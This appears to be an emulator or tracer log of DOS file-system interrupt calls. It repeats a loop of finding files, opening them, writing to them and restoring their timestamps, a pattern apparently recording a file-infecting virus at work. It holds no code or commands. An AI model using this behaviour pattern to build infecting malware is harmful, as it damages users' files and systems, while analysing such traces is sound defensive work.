2018-12-25T11:55:09.487264245Z 87 PC: 12adf | Get or set file date and time
2018-12-25T11:55:09.489326335Z 62 PC: 12ae3 | Close file
2018-12-25T11:55:09.498005902Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.501005916Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.508745659Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.516698477Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:09.518317042Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:09.521815828Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:09.523358405Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:09.526187527Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:09.52832062Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.536708707Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.539578634Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.546928118Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.555656692Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:09.557154769Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:09.560054538Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:09.563553008Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:09.566578252Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:09.568357014Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.577071989Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.580098461Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.587310289Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.595403553Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:09.596988018Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:09.599957666Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:09.60213403Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:09.605205348Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:09.606921121Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.615821149Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.619827216Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.627084133Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.635789307Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:09.637456407Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:09.64063453Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:09.642381455Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:09.645605654Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:09.647376234Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.655538185Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.658786534Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.66600056Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.673575422Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:09.675847783Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:09.685149663Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:09.686820016Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:09.694703854Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:09.696596283Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.705254033Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.708896926Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.71608892Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.723468827Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:09.725523585Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:09.728387903Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:09.729887543Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:09.733093626Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:09.734724155Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.742743408Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.746253307Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.754625563Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.757790199Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.761044647Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.763663716Z 26 PC: 12ac6 | Set disk transfer address